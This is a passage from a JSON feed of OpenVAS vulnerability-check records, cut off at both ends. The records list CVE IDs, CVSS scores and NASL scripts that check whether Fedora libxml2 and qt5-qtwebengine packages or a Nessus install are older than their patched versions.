Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874119\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-15 08:49:42 +0100 (Thu, 15 Feb 2018)\");\n script_cve_id(\"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\",\n \"CVE-2017-8872\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2018-a6b59d8f78\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a6b59d8f78\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FMHEXSXRPASMXWMMIMMGZ5NAFH22EGNY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.7~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2018-db610fff5b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9049", "CVE-2017-8872", "CVE-2017-9048", "CVE-2016-5131", "CVE-2017-9047", "CVE-2016-4658", "CVE-2017-9050"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874073", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_db610fff5b_libxml2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libxml2 FEDORA-2018-db610fff5b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874073\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-31 07:58:38 +0100 (Wed, 31 Jan 2018)\");\n script_cve_id(\"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\",\n \"CVE-2017-8872\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2018-db610fff5b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-db610fff5b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PBWYRHEVCVJN2ELXKZBFGCVFBBOGVDL7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.7~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2017-a3a47973eb", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1840", "CVE-2016-1836", "CVE-2016-1762", "CVE-2016-1834", "CVE-2016-9318", "CVE-2016-1835", "CVE-2016-4449", "CVE-2016-1837", "CVE-2016-4448", "CVE-2016-1838", "CVE-2016-5131", "CVE-2016-1839", "CVE-2016-4447", "CVE-2016-4658", "CVE-2016-1833"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872591", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872591", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libxml2 FEDORA-2017-a3a47973eb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872591\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 06:41:51 +0200 (Thu, 20 Apr 2017)\");\n script_cve_id(\"CVE-2016-9318\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-1762\",\n \"CVE-2016-1834\", \"CVE-2016-1840\", \"CVE-2016-1838\", \"CVE-2016-1839\",\n \"CVE-2016-1836\", \"CVE-2016-4449\", \"CVE-2016-4448\", \"CVE-2016-1837\",\n \"CVE-2016-1835\", \"CVE-2016-4447\", \"CVE-2016-1833\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2017-a3a47973eb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-a3a47973eb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6RYADVQ3O3C3UNPVVMTGCWLDPTVRGEJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.4~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2017-be8574d593", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1840", "CVE-2016-1836", "CVE-2016-1762", "CVE-2016-1834", "CVE-2016-9318", "CVE-2016-1835", "CVE-2016-4449", "CVE-2016-1837", "CVE-2016-4448", "CVE-2016-1838", "CVE-2016-5131", "CVE-2016-1839", "CVE-2016-4447", "CVE-2016-4658", "CVE-2016-1833"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872590", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872590", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libxml2 FEDORA-2017-be8574d593\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872590\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 06:41:10 +0200 (Thu, 20 Apr 2017)\");\n script_cve_id(\"CVE-2016-9318\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-1762\",\n \"CVE-2016-1834\", \"CVE-2016-1840\", \"CVE-2016-1838\", \"CVE-2016-1839\",\n \"CVE-2016-1836\", \"CVE-2016-4449\", \"CVE-2016-4448\", \"CVE-2016-1837\",\n \"CVE-2016-1835\", \"CVE-2016-4447\", \"CVE-2016-1833\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2017-be8574d593\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-be8574d593\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAU7AKDLMTZM2WRM2TPNPFLYQCKYMG7G\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.4~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:33", "description": "This host is running Nessus and is prone to\n multiple vulnerabilities.", "cvss3": {}, "published": "2018-06-15T00:00:00", "type": "openvas", "title": "Tenable Nessus Multiple Vulnerabilities(tns-2018-08)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8388", "CVE-2017-16931", "CVE-2017-9233", "CVE-2016-9840", "CVE-2017-7375", "CVE-2017-7244", "CVE-2017-11742", "CVE-2015-8391", "CVE-2018-11214", "CVE-2016-9063", "CVE-2016-5300", "CVE-2015-8395", "CVE-2015-8382", "CVE-2017-5969", "CVE-2016-9318", "CVE-2015-8386", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-9842", "CVE-2017-8872", "CVE-2012-0876", "CVE-2012-6702", "CVE-2016-0718", "CVE-2015-8392", "CVE-2015-8389", "CVE-2018-9251", "CVE-2015-8380", "CVE-2017-9048", "CVE-2014-8964", "CVE-2016-1283", "CVE-2017-5029", "CVE-2015-8394", "CVE-2012-6139", "CVE-2016-5131", "CVE-2015-3217", "CVE-2016-3191", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-7246", "CVE-2017-7245", "CVE-2017-1000061", "CVE-2017-9047", "CVE-2016-1683", "CVE-2015-8383", "CVE-2016-1684", "CVE-2015-8381", "CVE-2017-7186", "CVE-2015-5073", "CVE-2017-18258", "CVE-2015-8385", "CVE-2016-9841", "CVE-2017-16932", "CVE-2015-9019", "CVE-2015-7995", "CVE-2015-2328", "CVE-2016-4472", "CVE-2014-9769", "CVE-2015-8387", "CVE-2015-8390", "CVE-2017-6004", "CVE-2017-9050"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813437", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813437", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Tenable Nessus Multiple Vulnerabilities(tns-2018-08)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:tenable:nessus\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813437\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2017-11742\", \"CVE-2017-9233\", \"CVE-2016-9063\", \"CVE-2016-0718\",\n \"CVE-2016-5300\", \"CVE-2012-0876\", \"CVE-2016-4472\", \"CVE-2012-6702\",\n \"CVE-2018-11214\", \"CVE-2017-18258\", \"CVE-2017-16932\", \"CVE-2017-16931\",\n \"CVE-2017-9050\", \"CVE-2017-9049\", \"CVE-2017-9048\", \"CVE-2017-9047\",\n \"CVE-2017-8872\", \"CVE-2017-7375\", \"CVE-2017-5969\", \"CVE-2016-9318\",\n \"CVE-2016-5131\", \"CVE-2018-9251\", \"CVE-2017-1000061\", \"CVE-2012-6139\",\n \"CVE-2015-7995\", \"CVE-2015-9019\", \"CVE-2016-1683\", \"CVE-2016-1684\",\n \"CVE-2017-5029\", \"CVE-2016-9840\", \"CVE-2016-9841\", \"CVE-2016-9842\",\n \"CVE-2016-9843\", \"CVE-2014-8964\", \"CVE-2014-9769\", \"CVE-2015-2327\",\n \"CVE-2015-2328\", \"CVE-2015-3217\", \"CVE-2015-5073\", \"CVE-2015-8380\",\n \"CVE-2015-8381\", \"CVE-2015-8382\", \"CVE-2015-8383\", \"CVE-2015-8384\",\n \"CVE-2015-8385\", \"CVE-2015-8386\", \"CVE-2015-8387\", \"CVE-2015-8388\",\n \"CVE-2015-8389\", \"CVE-2015-8390\", \"CVE-2015-8391\", \"CVE-2015-8392\",\n \"CVE-2015-8394\", \"CVE-2015-8395\", \"CVE-2016-1283\", \"CVE-2016-3191\",\n \"CVE-2017-6004\", \"CVE-2017-7186\", \"CVE-2017-7244\", \"CVE-2017-7245\",\n \"CVE-2017-7246\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-15 11:03:08 +0530 (Fri, 15 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Tenable Nessus Multiple Vulnerabilities(tns-2018-08)\");\n\n script_tag(name:\"summary\", value:\"This host is running Nessus and is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as some of the third-party\n components used within Nessus to provide underlying functionality were found to\n contain various vulnerabilities. The components with vulnerabilities include\n expat, libjpeg, libXML2, libXMLSEC, libXSLT, Zlib and libPCRE\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers potentially to gain privileges, execute arbitrary code, bypass\n security restrictions, conduct denial-of-service, gain access to potentially\n sensitive information, conduct XML External Entity (XXE) attacks and unspecified\n other impacts.\");\n\n script_tag(name:\"affected\", value:\"Nessus versions prior to version 7.1.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to nessus version 7.1.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com/security/tns-2018-08\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nessus_web_server_detect.nasl\");\n script_mandatory_keys(\"nessus/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!nesPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:nesPort, exit_no_version:TRUE)) exit(0);\nnesVer = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:nesVer, test_version:\"7.1.1\"))\n{\n report = report_fixed_ver(installed_version:nesVer, fixed_version:\"7.1.1\", install_path:path);\n security_message(data:report, port:nesPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-11-22T16:28:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5023", "CVE-2017-5012", "CVE-2017-5009", "CVE-2016-5224", "CVE-2017-5037", "CVE-2017-5044", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5186", "CVE-2016-9651", "CVE-2017-5065", "CVE-2017-5026", "CVE-2016-9652", "CVE-2017-5033", "CVE-2017-5019", "CVE-2016-9650", "CVE-2016-5222", "CVE-2017-5059", "CVE-2016-5205", "CVE-2016-5221", "CVE-2017-5076", "CVE-2017-5017", "CVE-2016-5198", "CVE-2017-5007", "CVE-2016-5171", "CVE-2016-5133", "CVE-2017-5069", "CVE-2017-5050", "CVE-2016-5170", "CVE-2016-5207", "CVE-2017-5025", "CVE-2016-5215", "CVE-2016-5161", "CVE-2017-5071", "CVE-2017-5029", "CVE-2016-5147", "CVE-2017-5024", "CVE-2016-5185", "CVE-2017-5016", "CVE-2017-5046", "CVE-2017-5027", "CVE-2016-5181", "CVE-2017-5015", "CVE-2017-5047", "CVE-2017-5089", "CVE-2017-5010", "CVE-2017-5083", "CVE-2016-5214", "CVE-2017-5008", "CVE-2016-5153", "CVE-2016-5155", "CVE-2017-5067", "CVE-2017-5048", "CVE-2017-5075", "CVE-2017-5049", "CVE-2016-5188", "CVE-2017-5062", "CVE-2016-5192", "CVE-2017-5006", "CVE-2016-5172", "CVE-2017-5061", "CVE-2017-5070", "CVE-2017-5051", "CVE-2016-5187", "CVE-2016-5166", "CVE-2016-5078"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872901", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872901", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_98bed96d12_qt5-qtwebengine_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872901\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-24 05:44:15 +0200 (Mon, 24 Jul 2017)\");\n script_cve_id(\"CVE-2016-5133\", \"CVE-2016-5147\", \"CVE-2016-5153\", \"CVE-2016-5155\",\n \"CVE-2016-5161\", \"CVE-2016-5166\", \"CVE-2016-5170\", \"CVE-2016-5171\",\n \"CVE-2016-5172\", \"CVE-2016-5181\", \"CVE-2016-5185\", \"CVE-2016-5186\",\n \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5192\", \"CVE-2016-5198\",\n \"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5224\",\n \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\",\n \"CVE-2017-5006\", \"CVE-2017-5007\", \"CVE-2017-5008\", \"CVE-2017-5009\",\n \"CVE-2017-5010\", \"CVE-2017-5012\", \"CVE-2017-5015\", \"CVE-2017-5016\",\n \"CVE-2017-5017\", \"CVE-2017-5019\", \"CVE-2017-5023\", \"CVE-2017-5024\",\n \"CVE-2017-5025\", \"CVE-2017-5026\", \"CVE-2017-5027\", \"CVE-2017-5029\",\n \"CVE-2017-5033\", \"CVE-2017-5037\", \"CVE-2017-5044\", \"CVE-2017-5046\",\n \"CVE-2017-5047\", \"CVE-2017-5048\", \"CVE-2017-5049\", \"CVE-2017-5050\",\n \"CVE-2017-5051\", \"CVE-2017-5059\", \"CVE-2017-5061\", \"CVE-2017-5062\",\n \"CVE-2017-5065\", \"CVE-2017-5067\", \"CVE-2017-5069\", \"CVE-2017-5070\",\n \"CVE-2017-5071\", \"CVE-2017-5075\", \"CVE-2017-5076\", \"CVE-2016-5078\",\n \"CVE-2017-5083\", \"CVE-2017-5089\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LV2U7SINGF3SBK7HVKSWFOYLQBUH6PUE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.6.3~0.1.20170712gitee719ad313e564.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:01", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Vulnerabilities-01 September-2016", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4727", "CVE-2016-5771", "CVE-2016-6288", "CVE-2016-6290", "CVE-2016-4713", "CVE-2016-4750", "CVE-2016-4716", "CVE-2016-4703", "CVE-2016-5772", "CVE-2016-4722", "CVE-2016-4753", "CVE-2016-4752", "CVE-2016-4773", "CVE-2016-4694", "CVE-2016-4696", "CVE-2016-4701", "CVE-2016-0755", "CVE-2016-4715", "CVE-2016-4712", "CVE-2016-4708", "CVE-2016-4709", "CVE-2016-4748", "CVE-2016-4755", "CVE-2016-5770", "CVE-2016-5768", "CVE-2016-4717", "CVE-2016-4710", "CVE-2016-4745", "CVE-2016-4776", "CVE-2016-6174", "CVE-2016-4711", "CVE-2016-4699", "CVE-2016-6295", "CVE-2016-4697", "CVE-2016-6297", "CVE-2016-4739", "CVE-2016-6292", "CVE-2016-4698", "CVE-2016-4736", "CVE-2016-4707", "CVE-2016-5131", "CVE-2016-6289", "CVE-2016-4718", "CVE-2016-4777", "CVE-2016-4738", "CVE-2016-4723", "CVE-2016-4724", "CVE-2016-5769", "CVE-2016-6294", "CVE-2016-4725", "CVE-2016-4742", "CVE-2016-4706", "CVE-2016-5773", "CVE-2016-4772", "CVE-2016-4779", "CVE-2016-4771", "CVE-2016-4726", "CVE-2016-4658", "CVE-2016-4700", "CVE-2016-4775", "CVE-2016-6291", "CVE-2016-4774", "CVE-2016-4778", "CVE-2016-4702", 